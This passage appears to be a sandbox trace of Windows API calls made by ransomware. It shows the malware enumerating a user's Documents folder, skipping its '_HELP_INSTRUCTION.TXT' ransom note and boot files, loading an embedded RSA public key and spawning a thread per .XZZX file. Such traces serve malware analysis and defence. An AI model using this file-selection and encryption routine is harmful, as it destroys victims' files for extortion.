PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.184] lstrcpyW (in: lpString1=0x17cf1c, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0103.184] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0103.184] Sleep (dwMilliseconds=0x96) [0103.340] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.340] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2="..") returned 1 [0103.340] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2=".") returned 1 [0103.340] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.340] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntldr") returned 0x0 [0103.340] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTLDR") returned 0x0 [0103.340] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.340] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.340] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.340] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.340] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.340] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.340] lstrcpyW (in: lpString1=0x17cf1c, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0103.340] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0103.341] Sleep (dwMilliseconds=0x96) [0103.496] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.496] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2="..") returned 1 [0103.496] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2=".") returned 1 [0103.496] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.496] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntldr") returned 0x0 [0103.496] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTLDR") returned 0x0 [0103.496] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.496] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.496] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.496] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.496] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.496] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.496] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0103.496] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x358 [0103.497] Sleep (dwMilliseconds=0x96) [0103.652] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.652] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2="..") returned 1 [0103.652] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2=".") returned 1 [0103.652] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.652] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntldr") returned 0x0 [0103.652] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTLDR") returned 0x0 [0103.652] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.652] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.652] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.652] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.652] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.652] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.652] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0103.652] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0103.653] Sleep (dwMilliseconds=0x96) [0103.808] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.808] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2="..") returned 1 [0103.808] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2=".") returned 1 [0103.808] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.808] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntldr") returned 0x0 [0103.808] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTLDR") returned 0x0 [0103.808] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.808] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.808] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.808] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.808] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0103.808] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.808] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0103.809] Sleep (dwMilliseconds=0x96) [0103.964] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0103.964] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2="..") returned 1 [0103.964] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2=".") returned 1 [0103.964] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0103.964] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntldr") returned 0x0 [0103.964] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTLDR") returned 0x0 [0103.964] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0103.964] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntdetect.com") returned 0x0 [0103.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0103.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0103.964] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0103.964] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.964] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0103.964] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x364 [0103.965] Sleep (dwMilliseconds=0x96) [0104.120] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.120] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2="..") returned 1 [0104.120] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2=".") returned 1 [0104.120] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.120] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntldr") returned 0x0 [0104.120] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTLDR") returned 0x0 [0104.120] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.120] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntdetect.com") returned 0x0 [0104.120] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.120] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.120] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.120] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.120] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0104.120] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x368 [0104.120] Sleep (dwMilliseconds=0x96) [0104.276] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.276] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2="..") returned 1 [0104.276] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2=".") returned 1 [0104.276] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.276] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntldr") returned 0x0 [0104.276] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTLDR") returned 0x0 [0104.276] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.276] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0104.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.276] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.276] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.276] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0104.276] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x36c [0104.277] Sleep (dwMilliseconds=0x96) [0104.432] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.432] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2="..") returned 1 [0104.432] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2=".") returned 1 [0104.432] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.432] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="ntldr") returned 0x0 [0104.432] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTLDR") returned 0x0 [0104.432] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.432] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", 